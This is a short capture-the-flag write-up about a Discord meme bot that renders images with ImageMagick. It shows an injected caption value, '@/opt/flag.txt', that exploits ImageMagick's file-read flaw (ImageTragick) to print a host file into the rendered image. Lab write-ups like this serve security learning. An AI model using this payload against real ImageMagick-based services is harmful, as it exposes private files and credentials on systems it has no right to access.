# MDL Considered Harmful

## Problem

There's a bot named MDLChef in the Discord. You need to DM it, it doesn't respond in the server. On its host machine, there's a file at /opt/flag.txt - it contains the flag. Go get it.

Note: This is NOT an OSINT challenge. The source code really isn't available. Good luck.

Author: nb

## Solution

If we use the `/credits` command, we can understand more of the stack.

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-b8bbe2cad9879d918810f715051b12c8d3d775e8%2F2481101b92dd4319be67bd3652b2ace6.png?alt=media)

We can see that ImageMagick is used.

I searched for ImageMagick exploits, and found <https://imagetragick.com/>.

It appears that if we use `caption:@/path/to/file`, we can read arbitrary files.

```
{
    version: "MDL/1.1",
    type: "meme",
    base: {
        format: "Meme.Legacy.BadLuckBrian"
    },
    caption: {
        topText: "@/opt/flag.txt",
        bottomText: "image tragick"
    }
}
```

The rendered image contains the flag:

![](https://3167364547-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MX1bWRlBzHpEPe1TYDD%2Fuploads%2Fgit-blob-bfe9c202792374d9e715f2ed52d8b54a665bbbc4%2F4b20d9ff12db491395a7cfd10c7f91be.png?alt=media)